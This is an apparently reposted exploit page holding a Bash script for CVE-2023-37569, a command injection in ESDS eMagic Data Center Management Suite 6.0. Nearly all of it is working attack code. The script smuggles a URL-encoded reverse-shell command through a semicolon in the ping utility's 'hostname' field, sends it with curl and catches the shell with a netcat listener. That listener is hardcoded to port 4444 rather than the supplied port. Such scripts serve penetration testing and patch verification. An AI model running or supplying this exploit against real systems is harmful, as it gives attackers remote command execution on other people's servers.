Share
## https://sploitus.com/exploit?id=PACKETSTORM:174084
# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection  
# Date: 03-08-2023  
# Exploit Author: Shubham Pandey & thewhiteh4t  
# Vendor Homepage: https://www.esds.co.in/enlight360  
# Version: 6.0.0  
# Tested on: Kali Linux  
# CVE : CVE-2023-37569  
  
URL=$1  
LHOST=$2  
LPORT=$3  
  
echo "*****************************"  
echo "* ESDS eMagic 6.0.0 RCE *"  
echo "* > CVE-2023-37569 *"  
echo "* > Shubham & thewhiteh4t *"  
echo "*****************************"  
  
if [ $# -lt 3 ]; then  
echo """  
USAGE :  
  
./exploit.sh http://<IP> <LHOST> <LPORT>  
./exploit.sh http://192.168.0.10 192.168.0.20 1337  
"""  
exit 1  
fi  
  
url="$1/index.php/monitor/operations/utilities/"  
  
echo "[+] URL : $URL"  
echo "[+] LHOST : $LHOST"  
echo "[+] LPORT : $LPORT"  
echo  
  
payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"  
  
post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846"  
  
echo "[!] Triggering exploit..."  
  
echo $url  
  
(sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &  
  
echo "[+] Catching shell..."  
nc -lvp 4444